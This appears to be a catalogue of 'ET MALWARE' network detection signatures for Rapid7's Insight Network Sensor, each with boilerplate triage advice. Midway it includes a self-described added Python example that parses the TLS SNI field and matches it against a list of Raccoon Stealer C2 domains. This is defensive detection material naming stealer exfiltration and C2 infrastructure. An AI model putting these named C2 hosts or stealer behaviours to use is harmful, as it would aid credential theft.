This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.PEx.Delphi.1151005043 Post-infection Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Phorpiex CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pift Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pift Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PivNoxy CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PlagueBot User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ponmocup.A Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Pony Variant FOX Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pottieq.A Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Poweliks.A Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Poweliks GET Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Predator Variant Dropper Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pripyat Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ProtonBot CnC Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ProtonBot Stealer Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Protux.B POST checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PSW.Agent.OIN CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PSW.Agent.OMP Variant CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PSW.Papras.CK file upload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PSW.QQPass.OZV Variant Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PSW.WOW.NLZ CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pteranodon CnC Exfil (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pteranodon CnC Exfil (POST) M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pterodo Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pterodo CnC Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pterodo CnC Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pterodo.NG Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PurpleFox Retrieving File (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PurpleWave Stealer CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PurpleWave Stealer CnC Exfil M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/PurpleWave Stealer Requesting Config

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Pykspa.C Public IP Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Qbot CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Qbot/Quakbot Downloader - Requesting Secondary Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer Checkin M6

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (autopartslarry .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (companyllc .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (finalcountdown .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (followmeasap13 .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (gogowormdealer .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (habbybearshop .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (heroofthe .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (hitfromthebong .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (letsmakesome .fun)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (lifemaindecision .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (mansizeprofile .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (mariofart8 .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (mydrinksare .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (mynameisgarfield .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (nameyourcatlikeshedeserved .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (nyqualitypizza .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (onthewire1 .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (perfectscenario .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (pleaseletmesleep .fun)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (return2monkey .fun)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (rpirpiwhyyouleaveyourhorse .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (seattlecarwash .fun)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (shehootastayonwhatshelirned .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (simsimsalabim .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (teastycandycoffe .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (thelegendofberia .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (thereisnoscheme .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (videomart .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (youaresoslow .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Raccoon Stealer CnC Domain in TLS SNI (youcanfindmeonthe .top)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.
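
The Raccoon Stealer "CnC Domain in TLS SNI" rules above all key on one field: the server_name (SNI) that a client sends in the clear inside its TLS ClientHello, which a passive sensor can read without decrypting the session. The Python below is an added example, not code from Rapid7 or from the Emerging Threats rule set, that shows how such a check works end to end: it builds a constructed ClientHello carrying an SNI, parses the SNI back out the way a sensor would, and matches it against the domains named in the signatures above (re-joined from their defanged "name .tld" form). The matching semantics are an assumption (exact domain or any subdomain of it); the real signatures' match options are not shown on this page.

```python
import struct

# Domain list re-joined from the defanged signature names on this page
# (e.g. "autopartslarry .top"); it is only the subset this page lists.
RACCOON_SNI_DOMAINS = frozenset({
    "autopartslarry.top", "companyllc.top", "finalcountdown.top",
    "followmeasap13.top", "gogowormdealer.top", "habbybearshop.top",
    "heroofthe.top", "hitfromthebong.top", "letsmakesome.fun",
    "lifemaindecision.top", "mansizeprofile.top", "mariofart8.top",
    "mydrinksare.top", "mynameisgarfield.top", "nameyourcatlikeshedeserved.top",
    "nyqualitypizza.top", "onthewire1.top", "perfectscenario.top",
    "pleaseletmesleep.fun", "return2monkey.fun", "rpirpiwhyyouleaveyourhorse.top",
    "seattlecarwash.fun", "shehootastayonwhatshelirned.top", "simsimsalabim.top",
    "teastycandycoffe.top", "thelegendofberia.top", "thereisnoscheme.top",
    "videomart.top", "youaresoslow.top", "youcanfindmeonthe.top",
})


def build_client_hello(server_name: str) -> bytes:
    """Constructed test input: a minimal TLS 1.2 ClientHello record with one SNI extension."""
    name = server_name.encode("idna")
    sni_entry = b"\x00" + struct.pack("!H", len(name)) + name      # name_type host_name(0)
    sni_list = struct.pack("!H", len(sni_entry)) + sni_entry
    sni_ext = struct.pack("!HH", 0x0000, len(sni_list)) + sni_list  # extension type server_name
    extensions = struct.pack("!H", len(sni_ext)) + sni_ext
    body = (
        b"\x03\x03"                             # client_version: TLS 1.2
        + bytes(32)                             # random (zeros are fine for a parser test)
        + b"\x00"                               # session_id length 0
        + struct.pack("!H", 2) + b"\x13\x01"    # one cipher suite
        + b"\x01\x00"                           # one compression method: null
        + extensions
    )
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body       # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def extract_sni(record: bytes):
    """Return the host_name from a ClientHello's SNI extension, or None when it is absent,
    the record is not a ClientHello, or the capture is truncated (never guess)."""
    if len(record) < 9 or record[0] != 0x16 or record[5] != 0x01:
        return None
    hs_len = int.from_bytes(record[6:9], "big")
    body = record[9:9 + hs_len]
    if len(body) < hs_len:
        return None
    p = 2 + 32                                  # skip client_version and random
    if p >= len(body):
        return None
    p += 1 + body[p]                            # session_id
    if p + 2 > len(body):
        return None
    p += 2 + struct.unpack("!H", body[p:p + 2])[0]   # cipher_suites
    if p >= len(body):
        return None
    p += 1 + body[p]                            # compression_methods
    if p + 2 > len(body):
        return None                             # no extensions block: nothing to match
    ext_total = struct.unpack("!H", body[p:p + 2])[0]
    p += 2
    end = min(p + ext_total, len(body))
    while p + 4 <= end:
        ext_type, ext_len = struct.unpack("!HH", body[p:p + 4])
        p += 4
        data = body[p:p + ext_len]
        p += ext_len
        if ext_type != 0x0000 or len(data) < 5:
            continue
        list_end = min(2 + struct.unpack("!H", data[:2])[0], len(data))
        q = 2
        while q + 3 <= list_end:
            name_type = data[q]
            name_len = struct.unpack("!H", data[q + 1:q + 3])[0]
            q += 3
            if name_type == 0:
                try:
                    return data[q:q + name_len].decode("ascii").lower().rstrip(".")
                except UnicodeDecodeError:
                    return None
            q += name_len
    return None


def matches_raccoon_sni(sni, domains=RACCOON_SNI_DOMAINS):
    """Assumed rule semantics: exact domain or any subdomain of it. Returns the matched domain."""
    if not sni:
        return None
    for domain in domains:
        if sni == domain or sni.endswith("." + domain):
            return domain
    return None


def triage(record: bytes):
    """What a responder wants next to the alert: the SNI seen and the signature domain it hit."""
    sni = extract_sni(record)
    return sni, matches_raccoon_sni(sni)
```

When triaging one of these alerts, pull the SNI from the flow record and compare it with the domain in the signature name; the dot-prefixed suffix test above is what keeps a look-alike such as notautopartslarry.top from matching. The SNI is only usable while it is sent in the clear: Encrypted Client Hello hides it, and a sensor that saw only a truncated record gets None from extract_sni rather than a guess, so an alert with no SNI in the flow record should be checked against the destination address instead.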

ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Radonskra.B C2 Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ramsay CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Rarog Stealer CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Rarog Stealer CnC Keep-Alive

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Razy.azv Downloading Content

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/RCAP CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Reconyc.equo Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Redyms.A Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Renos/Artro Trojan Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Retadup CnC Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Retadup CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Retadup Success Response from CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Riberow.A (fsize)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Riberow.A (listdir)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Riberow.A (mkdir)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Riberow.A (postit3)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Rioselx.A Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/RiskWare.YouXun.AD CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/RocketX Stealer CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Rodecap CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Rodecap/Travle/PYLOT CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Roficor.A (Darkhotel) Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Rovnix.I Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Rovnix.J Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ruckguv.A Requesting Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Runner/Bublik Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sabsik Config Downloader

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Sabsik.FL.B!ml CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Sality-GR Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Sality-GR Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Sality User-Agent (DEBUT.TMP)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
